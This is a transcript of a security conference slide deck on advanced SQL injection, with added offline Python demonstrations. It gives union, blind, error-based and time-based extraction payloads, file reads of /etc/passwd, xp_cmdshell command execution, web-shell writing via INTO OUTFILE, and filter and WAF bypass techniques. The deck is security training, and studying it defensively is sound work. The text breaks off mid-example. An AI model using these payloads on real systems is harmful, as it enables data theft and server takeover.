pt devteev advanced sql injection eng 091118184202 phpapp02
TRANSCRIPT
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
1/62
Subjects in Question
Introduction to web application security
Classical approach to SQL Injection exploitation
Blind SQL Injection
Working with the file system and executing commands on the server under SQL Injection exploitation
Methods to bypass program security filters
Methods to bypass a Web Application Firewall (WAF)
Conclusions
Introduction to Web Application Security
Unsafe World of Web Applications
According to the statistics collected by PositiveTechnologies in 2008,
83% of sites contain critical vulnerabilities
78% of sites contain vulnerabilities of moderate risk level
the probability that the pages of a vulnerable web application get infected with malicious code automatically is about 15-20%
http://ptsecurity.ru/analytics.asp
The data is based on automatic scanning of 16121 systems, detailed analysis of 59 web applications
including analysis of the source code of over 10 applications.
Chapter 1: SQL Injection Vulnerability
Classical Approach to SQL Injection Exploitation
Illustrative Example of SQL Injection
Browser -> Web Server -> DBMS
Request: http://web/?id=6329&print=Y
Query the web server sends to the DBMS:
SELECT * from news where id = 6329
Illustrative Example of SQL Injection
Browser -> Web Server -> DBMS
Request: http://web/?id=6329+union+select+id,pwd,0+from...
Query the web server sends to the DBMS:
SELECT * from news where id = 6329 union select id,pwd,0 from...
SQL Injection Basic Concepts
SQL Injection
A method to attack a database bypassing firewalls: the parameters passed to the database through a web application are modified so that the SQL query being executed changes.
There are two types of SQL Injection
SQL Injection into a string parameter
Examples:
SELECT * from table where name = "$_GET['name']"
SELECT id, acl from table where user_agent ='$_SERVER["HTTP_USER_AGENT"]'
SQL Injection into a numeric parameter
Examples:
SELECT login, name from table where id = $_COOKIE["id"]
SELECT id, news from table where news = 123 limit $_POST["limit"]
SQL Injection Basic Concepts
Methods of SQL Injection exploitation are classified according to the DBMS type and the exploitation conditions:
The vulnerable query may be an INSERT, UPDATE or DELETE, not only a SELECT
SQL code can be injected into any part of the SQL query
Blind SQL Injection
Features of the SQL dialect implemented by each DBMS
SQL Injection is characteristic not only of web applications!
SQL Injection Basic Concepts
SQL Injection classification
SQL Injection can be exploited both while the attack is being carried out and some time later (second-order injection, when the stored value is used in a later query)
SQL Injection Basic Concepts
Methods to detect SQL Injection
Function testing (black/white-box)
Fuzzing
Static/dynamic/manual analysis of the source code
Examples of function testing for http://site/?param=123
http://site/?param=1'
http://site/?param=1"
http://site/?param=1'--
http://site/?param=1'/*
http://site/?param=1'#
http://site/?param=1 AND 1=1--
http://site/?param=1 AND 1=2--
http://site/?param=1' AND '1'='1
http://site/?param=1 order by 1000
... etc.
SQL Injection Classical Exploitation (MySQL)
Vulnerability detection
/?id=1+ORDER+BY+100
SQL request looks like
SELECT id, name from table where id =1 ORDER BY 100
As a result, the following error message can be received
ERROR 1054 (42S22): Unknown column '100' in 'order clause'
Obtaining table/column names (from information_schema, or by searching) and then obtaining data from the discovered tables
/?id=1+union+select+0,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns
SQL request becomes
SELECT id, name from table where id =1 union select
0,concat_ws(0x3a,table_name,column_name) from information_schema.columns
As a result, the desired information can be received in the following form
| 0 | table1:column1 |
| 0 | table1:column2 |
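The union-based exploitation shown on slides 7, 8 and 13, as an added example that is not part of the original presentation. SQLite stands in for MySQL so it runs offline: sqlite_master plays the part of information_schema.columns, and the news/users tables and their contents are constructed for the example. The parameterized variant is the fix, shown for contrast.

```python
import sqlite3

# Constructed sample data (not from the presentation): the news table the
# page reads and a users table holding what the attacker is after.
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
INSERT INTO news VALUES (6329, 'Release notes', 'text');
CREATE TABLE users(id INTEGER, login TEXT, pwd TEXT);
INSERT INTO users VALUES (1, 'admin', 'hunter2');
""")

def news_vulnerable(id_param):
    """Numeric parameter glued into the statement: the pattern from the slides."""
    return db.execute("SELECT * FROM news WHERE id = " + id_param).fetchall()

def news_parameterized(id_param):
    """The fix: type-check, then bind; the value is never parsed as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return db.execute("SELECT * FROM news WHERE id = ?", (id_value,)).fetchall()

# Slide 8: append a UNION with the same number of columns (three here).
UNION_PAYLOAD = "6329 union select id,pwd,0 from users"

# Slide 13: read the catalogue first.  SQLite has no information_schema;
# sqlite_master (name, sql) plays its part in this example.
SCHEMA_PAYLOAD = "6329 union select 0,name,sql from sqlite_master"

def leaked_rows(payload):
    """Rows the attacker receives that do not belong to the news table."""
    return [row for row in news_vulnerable(payload) if row[0] != 6329]

if __name__ == "__main__":
    print(leaked_rows(SCHEMA_PAYLOAD))     # table names and their DDL
    print(leaked_rows(UNION_PAYLOAD))      # (1, 'hunter2', 0)
    print(news_parameterized(UNION_PAYLOAD))  # [] : the payload is not a number
```

The extra rows arrive in the same response as the legitimate news entry, which is why the page must render every row of the result set for this to work; the blind techniques in chapter 2 cover the case where it does not.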
SQL Injection Features of Different DBMSs
Features of exploitation for different DBMSs
Example (MySQL):      SELECT * from table where id = 1 union select 1,2,3
Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3
Example (Oracle):     SELECT * from table where id = 1 union select null,null,null from sys.dual

String concatenation
  MySQL:      concat(,), concat_ws(delim,)
  MSSQL:      ' '+' '
  MS Access:  " "&" "
  Oracle:     ' '||' ', '' concat ''
  DB2:        " "+" ", ' '||' '
  PostgreSQL: ' '||' '
Comments
  MySQL:      -- and /* */ and #
  MSSQL:      -- and /* */
  MS Access:  No
  Oracle:     -- and /* */
  DB2:        --
  PostgreSQL: -- and /* */
Request (union / stacked queries with ;)
  MySQL:      union
  MSSQL:      union and ;
  MS Access:  union
  Oracle:     union
  DB2:        union
  PostgreSQL: union and ;
Sub-requests (subqueries)
  MySQL:      v.4.1 >=
  MSSQL:      Yes
  MS Access:  No
  Oracle:     Yes
  DB2:        Yes
  PostgreSQL: Yes
Stored procedures
  MySQL:      No (stored procedures exist from 5.0, but without stacked queries a CALL cannot be injected)
  MSSQL:      Yes
  MS Access:  No
  Oracle:     Yes
  DB2:        No
  PostgreSQL: Yes
Availability of information_schema or its analogs
  MySQL:      v.5.0 >=
  MSSQL:      Yes
  MS Access:  Yes
  Oracle:     Yes
  DB2:        Yes
  PostgreSQL: Yes
SQL Injection Exploitation for Different DBMSs
MySQL 4.1>=
First entry:  /?id=1 union select name,123 from users limit 0,1
Second entry: /?id=1 union select name,123 from users limit 1,1
MSSQL (no LIMIT: number the rows with row_number() and pick one; the derived table t only exposes rownum and name, so the outer select must use name)
First entry:  /?id=1 union select name,123 from (select row_number() over (order by name) as rownum, name from users) as t where t.rownum=1
Second entry: /?id=1 union select name,123 from (select row_number() over (order by name) as rownum, name from users) as t where t.rownum=2
PostgreSQL
First entry:  /?id=1 union select name, null from users limit 1 offset 0
Second entry: /?id=1 union select name, null from users limit 1 offset 1
or, with stacked queries
First entry:  /?id=1; select name, 123 from users limit 1 offset 0
Second entry: /?id=1; select name, 123 from users limit 1 offset 1
Chapter 2: Blind SQL Injection
Blind SQL Injection
Blind SQL Injection Basic Concepts
Blind SQL Injection
A method to attack a database bypassing firewalls. While exploiting an SQL Injection vulnerability the attacker analyses the application's logic (true/false responses) instead of reading query output directly.
Blind SQL Injections can be classified according to the following criteria
Blind SQL Injection Basic Concepts
Methods to detect Blind SQL Injection
http://site/?param=-1 OR 1=1
http://site/?param=-1 OR 1=1--
...
http://site/?param=-1'
http://site/?param=-1' AND 1=2
...
http://site/?param=-1' OR '1'='1
...
http://site/?param=-1"/*
...
http://site/?param=2
http://site/?param=1
http://site/?param=2-1
...
http://site/?param=1' AND 1=1
http://site/?param=1' AND '1'='1
etc.
Methods to detect Double Blind SQL Injection (time-based)
http://site/?param=-1 AND benchmark(2000,md5(now()))
...
http://site/?param=-1' AND benchmark(2000,md5(now()))--
...
etc.
Blind SQL Injection Classical Exploitation (MySQL)
Searching for the first character of the first table entry
/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),1,1))=97,555,777)
SQL request becomes
SELECT id, name from table where id =1 AND 555=if(ord(mid((select pass from users limit 0,1),1,1))=97,555,777)
If the table users contains a column pass and the first character of the first entry in this column has code 97 (letter a), the condition is TRUE and the page shows entry 1; otherwise it is FALSE and the page shows nothing.
Searching for the second character of the first table entry
/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),2,1))=97,555,777)
SQL request becomes
SELECT id, name from table where id =1 AND 555=if(ord(mid((select pass from users limit 0,1),2,1))=97,555,777)
If the second character of the first entry in column pass has code 97 (letter a), the condition is TRUE; otherwise, FALSE.
Blind SQL Injection Classical Exploitation (MySQL): let's go faster
We can restrict the range of the character search. For an MD5 hash it is [0-9a-f], i.e. codes 48-57 and 97-102. Moreover, we can use inequality signs and bisect that range instead of testing each value in turn.
Searching for the first character of the first table entry
/?id=1+AND+555=if(ord(lower(mid((select+pass+from+users+limit+0,1),1,1)))>97,555,777)
If the table users contains a column pass and the first character of the first entry in this column has a code greater than 97 (letter a), the DBMS returns TRUE; otherwise, FALSE.
Searching for the first character of the second table entry
/?id=1+AND+555=if(ord(lower(mid((select+pass+from+users+limit+1,1),1,1)))
Blind SQL Injection New Methods of Exploitation (MySQL): and even faster
It is possible to test up to 12 candidate values of a character with a single request, because each candidate produces a distinguishable response (method by Qwazar, X0709)
Searching for the first character of the first table entry
/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,
(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,
(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,
(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,
(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,
(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,
(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,
(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,
(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,
(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,
(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,
(select 1 union select 2),(1)))))))))))))
If the table users contains a column pass and the first character of the first entry in this column belongs to the range [0-9a], the DBMS returns an error message, and which error it is tells which character matched. Otherwise it returns 1, i.e. the request is correct.
Blind SQL Injection New Methods of Exploitation (MySQL): at the same rate
How does it work?
MySQL returns distinct error messages for different invalid regexps:
select 1 regexp if(1=1,"x{1,0}",2)
#1139 - Got error 'invalid repetition count(s)' from regexp
select 1 regexp if(1=1,"x{1,(",2)
#1139 - Got error 'braces not balanced' from regexp
etc.
An error message is also produced when a subquery unexpectedly returns two rows instead of one (method by Elekt):
select if(1=1,(select 1 union select 2),2)
#1242 - Subquery returns more than 1 row
Note: in the example, hexadecimal equivalents were used, e.g. 0x787B312C307D instead of x{1,0}
Blind SQL Injection New Methods of Exploitation (MySQL): at the same rate
If an MD5 hash is to be found, at most two requests per character are required.
Request 1
/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 union select 2),(1)))))))))))))
If the character does not belong to the range [0-9a], the second request is sent (checking [b-f])
/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 union select 2),(1)))))))))))))
Blind SQL Injection New Methods of Exploitation (MySQL): at the maximal rate!
A new method using the function ExtractValue(), based on Qwazar's experiments (X0909) with the function NAME_CONST() in MySQL 5.0.12 to 5.0.64:
select 1 AND ExtractValue(1,concat(0x5C,('test')));
As a result, the following error message is received (if the MySQL version is >= 5.1):
XPATH syntax error: '\test'
Thus, we can simply return the desired data inside the error message:
/?id=1+AND+extractvalue(1,concat(0x5C,(select pass from users limit 0,1)))
SQL request becomes
SELECT id, name from table where id =1 AND extractvalue(1,concat(0x5C,(select pass from users limit 0,1)))
As a result, the desired information is shown in the error message.
The error message string cannot contain more than 31 characters; mid() and similar functions can be applied to display longer strings piece by piece.
Blind SQL Injection New Methods of Exploitation (MySQL): the rate limit
What if error messages are suppressed?
We can restrict the range of the character search. For example, for MD5 this range is [0-9a-f].
We can use news titles, site sections etc. as signatures: each candidate character is mapped to a different, recognisable page.
Implementation:
/?id=if((mid((select pwd from users limit 0,1),1,1)in('a'))>0,(12345),if((mid((select pwd from users limit 0,1),1,1)in('b'))>0,(12346), .. ,null))
or
/?id=if((mid((select pwd from users limit 0,1),1,1)in('a','b','c','d','e','f'))>0,(12345),if((mid((select pwd from users limit 0,1),1,1)in('0','1','2','3','4','5','6','7','8','9'))>0,(12346), .. ,null))
In this example, 12345 and 12346 are identifiers of news items on the site.
Restrictions of this method: a suitable application architecture (an id that selects a recognisable page); the length of the HTTP request cannot exceed 4096 bytes.
Double Blind SQL Injection Classical Exploitation (MySQL): more haste, less speed ;)
Exploitation of Double Blind SQL Injection is based on time delays.
We can restrict the range of the character search to increase performance.
Classical implementation:
/?id=1+AND+if((ascii(lower(substring((select password from user limit 0,1),1,1))))=97,1,benchmark(2000000,md5(now())))
Whether the character was guessed right is inferred from the delay of the web server's response (positions in substring() are 1-based; substring(s,0,1) returns an empty string in MySQL).
By manipulating the value 2000000 we can achieve acceptable performance for a concrete application.
The function sleep() is an analogue of benchmark(). In this context sleep() is safer, because it does not burn server CPU while waiting.
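The boolean and time-based extraction loops described on slides 19, 20 and 26, as one added example that is not part of the original presentation. SQLite stands in for MySQL so it runs offline: CASE WHEN replaces if(), unicode(substr()) replaces ord(mid()) and ascii(substring()), and a Python-registered sleep() replaces benchmark()/sleep(). The news/users tables, the hash value and the "page shows an entry" success signal are constructed for the example.

```python
import hashlib
import sqlite3
import time

# Constructed sample data (not from the slides): the news table the page reads
# and a users table with an MD5-style hex hash that the attacker extracts.
SECRET = hashlib.md5(b"s3cret").hexdigest()
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE news(id INTEGER, name TEXT);
INSERT INTO news VALUES (1, 'hello');
CREATE TABLE users(login TEXT, pass TEXT);
""")
db.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
# SQLite has no sleep(); a Python one is registered so the time-based
# variant can be exercised offline.
db.create_function("sleep", 1, lambda seconds: time.sleep(seconds))

DELAY = 0.3        # seconds the injected sleep() stalls the query
REQUESTS = 0       # how many "HTTP requests" an extraction cost

def vulnerable_page(id_param):
    """Stands in for /?id=...: the parameter is concatenated into the query
    (the bug being exploited); True when the page shows a news entry."""
    global REQUESTS
    REQUESTS += 1
    rows = db.execute("SELECT id, name FROM news WHERE id = " + id_param).fetchall()
    return len(rows) > 0

def char_code(pos):
    """unicode(substr(...)) is SQLite's spelling of ord(mid(...))."""
    return f"unicode(substr((SELECT pass FROM users LIMIT 1 OFFSET 0),{pos},1))"

def boolean_oracle(cond):
    """Slide 19/20 shape, 1 AND 555=if(cond,555,777); CASE WHEN replaces if()."""
    return vulnerable_page(f"1 AND 555=(CASE WHEN {cond} THEN 555 ELSE 777 END)")

def time_oracle(cond):
    """Slide 26 shape, 1 AND if(cond,1,benchmark(...)): the TRUE branch is the
    one that does not stall, so a fast answer means TRUE."""
    started = time.monotonic()
    vulnerable_page(f"1 AND (CASE WHEN {cond} THEN 1 ELSE sleep({DELAY}) END)")
    return time.monotonic() - started < DELAY / 2

HEX = "0123456789abcdef"   # MD5 alphabet, sorted by code point (48-57, 97-102)

def extract_linear(oracle, length, charset=HEX):
    """One equality test per candidate character (slide 19)."""
    out = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle(f"{char_code(pos)} = {ord(ch)}"):
                out += ch
                break
    return out

def extract_bisect(oracle, length, charset=HEX):
    """Inequality tests halve the remaining alphabet each time (slide 20):
    exactly four requests per character for a 16-symbol alphabet."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, len(charset) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{char_code(pos)} > {ord(charset[mid])}"):
                lo = mid + 1
            else:
                hi = mid
        out += charset[lo]
    return out

def run(extractor, oracle, length):
    """(extracted string, number of requests it cost)."""
    global REQUESTS
    REQUESTS = 0
    return extractor(oracle, length), REQUESTS

if __name__ == "__main__":
    print(run(extract_linear, boolean_oracle, 32))
    print(run(extract_bisect, boolean_oracle, 32))   # 128 requests for 32 characters
    print(run(extract_bisect, time_oracle, 4))       # slow: the FALSE branch sleeps
```

The same two extraction loops drive either oracle; only the oracle knows whether the signal is page content or response time, which is why restricting the alphabet and bisecting pays off most with the slow time-based channel.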
Chapter 3: Working with File System and Executing Commands on Server
Working with File System and Executing Commands on Server Under SQL Injection Exploitation
Working with File System
General architecture of using the file system via SQL Injection
The web server runs as uid=80(www) gid=80(www); the DBMS runs as uid=88(mysql) gid=88(mysql)
Requests are issued as the DBMS user (to work with the file system, the FILE privilege, file_priv, is required)
The file system is accessed by the DBMS user (appropriate permissions at the ACL level are required)
If you access a file created by the DBMS, keep in mind that its owner is the DBMS user, not the web server user
The current directory is the DBMS data directory
Working with File System: Differences between DBMSs
An example for MSSQL:
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
SELECT * FROM mydata;
DROP TABLE mydata;

Built-in functions / available functions
  MySQL:      Yes: load_file, load data infile, into outfile/dumpfile
  MSSQL:      No: procedures (e.g. insert from file)
  MS Access:  Yes: curdir()
  Oracle:     No: procedures (e.g. insert from file)
  PostgreSQL: Yes: pg_read_file(), pg_ls_dir(), copy, etc.
Working with File System
An example for MySQL
LOAD_FILE:
union select load_file('/etc/passwd')
LOAD DATA INFILE:
create table t(a varchar(500)); load data infile '/etc/passwd' into table t; select a from t;
SELECT ... INTO OUTFILE / SELECT ... INTO DUMPFILE:
union select 1 into outfile 't'
union select 1 into dumpfile 't'
Executing Commands on Server: Differences between DBMSs
An example for MSSQL:
EXEC xp_cmdshell 'ipconfig /all';
To use xp_cmdshell in MSSQL >= 2005, it must first be enabled:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Built-in functions / available functions
  MySQL:      No
  MSSQL:      Yes: EXEC xp_cmdshell
  MS Access:  Yes
  Oracle:     No: own procedures
  PostgreSQL: No: own procedures
Executing Commands on Server
An example for MySQL
Writing a web-shell to the file /www/img/shell.php (the quotes hold the PHP web-shell code)
/?id=1+union+select+''+into+outfile+'/www/img/shell.php'
Executing commands on the server through it
/img/shell.php?shell=passthru('ls');
Chapter 4: Methods to Bypass Security Filters
Methods to Bypass Security Filters
Filters for Incoming data. Types
Transparent for web applications
magic_quotes_gpc, display_errors, etc.
mod_rewrite, ISAPI filters, etc.
Built-in functions of the development language
Universal
Example: addslashes(), addcslashes(), htmlspecialchars(), etc
Meant for a certain environment. Example: mysql_real_escape_string(), pg_escape_string(), dbx_escape_string(), etc.
In-house design of a programmer
Type casting
Using regular expressions
Methods to Bypass Security Filters (1)
Apply an encoding to the data transmitted to the application
There is an unlimited number of ways to represent the string qwerty
Hex encoding: 0x717765727479
char() representation: char(113),char(119),char(101),char(114),char(116),char(121)
Encryption with various keys (the ciphertext itself is binary). Example:
hex(AES_ENCRYPT('qwerty',1)) is B969A9A01DA8E78FA8DD7E299C9CF23D
aes_decrypt(concat(0xB9,0x69,0xA9,0xA0,0x1D,0xA8,0xE7,0x8F,0xA8,0xDD,0x7E,0x29,0x9C,0x9C,0xF2,0x3D),1) is qwerty
Methods to Bypass Security Filters (2)
Apply codes that are not processed by the filter
Function synonyms
CHARACTER_LENGTH() -> CHAR_LENGTH()
LOWER() -> LCASE()
OCTET_LENGTH() -> LENGTH()
LOCATE() -> POSITION()
REGEXP() -> RLIKE()
UPPER() -> UCASE()
etc.
Obfuscated codes for requests and data
Examples of obfuscated codes for the string qwerty:
reverse(concat(if(1,char(121),2),0x74,right(left(0x567210,2),1),lower(mid('TEST',2,1)),replace(0x7074,'pt','w'),char(instr(123321,33)+110)))
concat(unhex(left(crc32(31337),3)-400),unhex(ceil(atan(1)*100-2)),unhex(round(log(2)*100)-4),char(114),char(right(cot(31337),2)+54),char(pow(11,2)))
Methods to Bypass Security Filters
An example of bypassing signatures (obfuscated code for a request)
The following request matches the application's signature
/?id=1+union+(select+1,2+from+test.users)
But sometimes the signatures can be bypassed
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)unIon(selEct(1),mid(hash,1,32)from(test.users))
/?id=1+union+(sELect'1',concat(login,hash)from+test.users)
/?id=(1)union(((((((select(1),hex(hash)from(test.users))))))))
/?id=(1);exec('sel'+'ect'(1))
/?id=(1)or(0x50=0x50)
Methods to Bypass Security Filters (3)
Use a null byte to bypass functions that are not binary-safe (ereg() treats its argument as a C string and stops at \0)
Example: if(ereg("^(.){1,3}$", $_GET['param'])) { }
/?param=123
ereg("^(.){1,3}$", "123") -> true
/?param=1234
ereg("^(.){1,3}$", "1234") -> false
/?param=1+union+select+1
ereg("^(.){1,3}$", "1 union select 1") -> false
/?param=123%00
ereg("^(.){1,3}$", "123\0") -> true
/?param=1/*%00*/union+select+1
ereg("^(.){1,3}$", "1/*\0*/union select 1") -> true (the check sees only "1/*", the DBMS sees the whole string)
Methods to Bypass Security Filters (4)
Bypassing the function addslashes()
It is possible if there is a vulnerability that allows attackers to set the connection encoding to SJIS, BIG5 or GBK
How does it work?
addslashes("'") turns 0x27 into "\'", i.e. 0x5c27
An example for GBK encoding:
0xbf27 is an illegal character
0xbf5c is a valid independent character
0xbf27, after processing with addslashes(), becomes 0xbf5c27, which a GBK connection reads as the character 0xbf5c followed by an unescaped single quote 0x27
Raz0r, http://raz0r.name/vulnerabilities/sql-inekcii-svyazannye-s-multibajtovymi-kodirovkami-i-addslashes/
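The multibyte escape bypass above worked through in Python, as an added example that is not code from the slides or from Raz0r's write-up: a byte-oriented addslashes() is modelled, then the escaped bytes are decoded the way a GBK connection reads them. The payload bytes are constructed for the example, and the charset-aware escaper stands in for mysql_real_escape_string() with the connection charset set correctly.

```python
import re

def addslashes(data: bytes) -> bytes:
    """Model of PHP addslashes(): escapes ' " \\ and NUL byte by byte,
    knowing nothing about the connection's character set."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            out += b"\\0"
        elif b in (0x27, 0x22, 0x5C):      # ' " \
            out += b"\\"
            out.append(b)
        else:
            out.append(b)
    return bytes(out)

def charset_aware_escape(data: bytes, charset: str) -> str:
    """A charset-aware escaper (what mysql_real_escape_string() does once the
    connection charset is set): decode to characters first, then escape
    characters, so a stray 0xbf lead byte cannot swallow the added backslash."""
    text = data.decode(charset, errors="replace")
    return "".join(
        "\\0" if ch == "\0" else ("\\" + ch if ch in "'\"\\" else ch)
        for ch in text
    )

UNESCAPED_QUOTE = re.compile(r"(?<!\\)'")

def unescaped_quotes(fragment: str) -> int:
    """Single quotes the SQL parser would treat as string delimiters."""
    return len(UNESCAPED_QUOTE.findall(fragment))

def as_gbk_connection_sees(escaped: bytes) -> str:
    """The statement text as a DBMS whose connection charset is GBK reads it."""
    return "SELECT * FROM users WHERE name = '" + escaped.decode("gbk", errors="replace") + "'"

# Constructed payload: the 0xbf lead byte followed by the attacker's quote.
PAYLOAD = b"\xbf' OR 1=1#"

def bypass_works(charset: str) -> bool:
    """True if the addslashes() output, read in `charset`, still has a live quote."""
    return unescaped_quotes(addslashes(PAYLOAD).decode(charset, errors="replace")) > 0

if __name__ == "__main__":
    print(addslashes(PAYLOAD))                       # b'\xbf\\\' OR 1=1#'
    print(as_gbk_connection_sees(addslashes(PAYLOAD)))
    print(bypass_works("gbk"), bypass_works("latin-1"))
```

Read as latin-1 the backslash stays in front of the quote and the escape holds; read as GBK the two bytes 0xbf 0x5c fuse into one character and the quote is free. The decode-then-escape variant cannot be tricked this way because the lone 0xbf is replaced before any escaping happens.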
Methods to Bypass Security Filters (5)
A common vulnerability in the functions of security filters
The following request does not let a malicious user conduct an attack
/?id=1+union+select+1,2,3/*
If the filter has the corresponding weakness, the following request is processed successfully
/?id=1+un/**/ion+sel/**/ect+1,2,3--
SQL request becomes
SELECT * from table where id =1 union select 1,2,3--
Any sequence of characters that the filter cuts out (e.g. #####, %00, etc.) can be used instead of /**/
The example works when incoming data is "over-cleaned": a regexp match is replaced with an empty string in a single pass and the keywords are not checked again afterwards
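The over-cleaning filter from this slide modelled in Python, as an added example (not code from the presentation). The keyword list, the cut sequences and the two payloads are taken from the slide; the fixpoint and validation variants are this example's own suggestion of how the filter should behave.

```python
import re

# Sequences the filter cuts out of the parameter and the keywords it blanks,
# as on the slide.  %00 is matched as literal text, i.e. the filter runs
# before URL decoding.
NOISE = re.compile(r"/\*.*?\*/|%00|#+", re.S)
KEYWORDS = re.compile(r"\b(union|select)\b", re.I)

def single_pass_filter(value: str) -> str:
    """The flawed 'over-cleaning' filter: keywords are blanked first, then the
    noise is removed, and the result is never inspected again."""
    value = KEYWORDS.sub("", value)
    return NOISE.sub("", value)

def fixpoint_filter(value: str) -> str:
    """Same rules, repeated until the value stops changing: the keyword that
    the noise removal reassembles is caught on the next pass."""
    while True:
        cleaned = single_pass_filter(value)
        if cleaned == value:
            return cleaned
        value = cleaned

def validated_id(value: str) -> int:
    """What the filter should have been for a numeric id: validate, do not clean."""
    if not re.fullmatch(r"[0-9]+", value):
        raise ValueError("id must be a non-negative integer")
    return int(value)

def accepts_id(value: str) -> bool:
    try:
        validated_id(value)
        return True
    except ValueError:
        return False

# The two requests from the slide, as the filter sees the id parameter.
BLOCKED = "1 union select 1,2,3/*"
SPLIT = "1 un/**/ion sel/**/ect 1,2,3--"

if __name__ == "__main__":
    print(repr(single_pass_filter(BLOCKED)))   # keywords gone
    print(repr(single_pass_filter(SPLIT)))     # '1 union select 1,2,3--'
    print(repr(fixpoint_filter(SPLIT)))        # keywords gone on the second pass
    print(accepts_id("1"), accepts_id(SPLIT))  # True False
```

Iterating to a fixpoint closes this particular hole, but a blacklist stays a blacklist (synonyms, case, encodings from the earlier slides still apply); for a numeric parameter the validation variant is the one to ship.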
Chapter 5: Methods to Bypass Web Application Firewall
Methods to Bypass Web Application Firewall (WAF)
What is WAF
Requests reaching the web server through the WAF:
http://server/?id=6329&print=Y
http://server/?id=5351
http://server/?id=8234
Requests the WAF stops ("An attack is detected! Alarm!!!"):
http://server/?id=>...
http://server/?id=1+union+select...
http://server/?id=/../../../etc/passwd
Data normalization
Decode HTML entities (e.g. &#99;, &quot;)
Escaped characters (e.g. \t, \001, \xAA, \uAABB)
Null byte string termination
...
Signature search
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
...
Classification
According to the behavior:
Bridge/Router
Reverse Proxy
Built-in
According to the protection model:
Signature-based
Rule-based
According to the response to a bad request:
Cleaning of dangerous data
Blocking the request
Blocking the attack source
Methods to Bypass WAF
Fundamental technology limitations
Inability to protect a web application from all possible vulnerabilities
General problems
With universal WAF filters it is necessary to balance filter efficiency against false positives, where valid traffic is blocked
Processing of the traffic returned to the client
Implementation vulnerabilities
Normalization techniques
Application of new methods of web vulnerability exploitation (HTTP Parameter Pollution, HTTP Parameter Fragmentation, null-byte replacement, etc.)
Practice of Bypassing WAF: SQL Injection HPP (example 1)
Using HTTP Parameter Pollution (HPP)
The following request does not let anyone conduct an attack
/?id=1;select+1,2,3+from+users+where+id=1--
This request is performed successfully using HPP
/?id=1;select+1&id=2,3+from+users+where+id=1--
Whether an HPP attack bypasses the WAF depends on the environment of the application being attacked (how the back end joins repeated parameters)
OWASP EU09, Luca Carettoni, Stefano di Paola
http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
Practice of Bypassing WAF: SQL Injection HPP
How does it work?
Practice of Bypassing WAF: SQL Injection HPP (example 2)
Using HTTP Parameter Pollution (HPP)
Vulnerable code
SQL="select key from table where id="+Request.QueryString("id")
This request is performed successfully using the HPP technique (ASP joins the repeated id values with commas)
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
The SQL request becomes
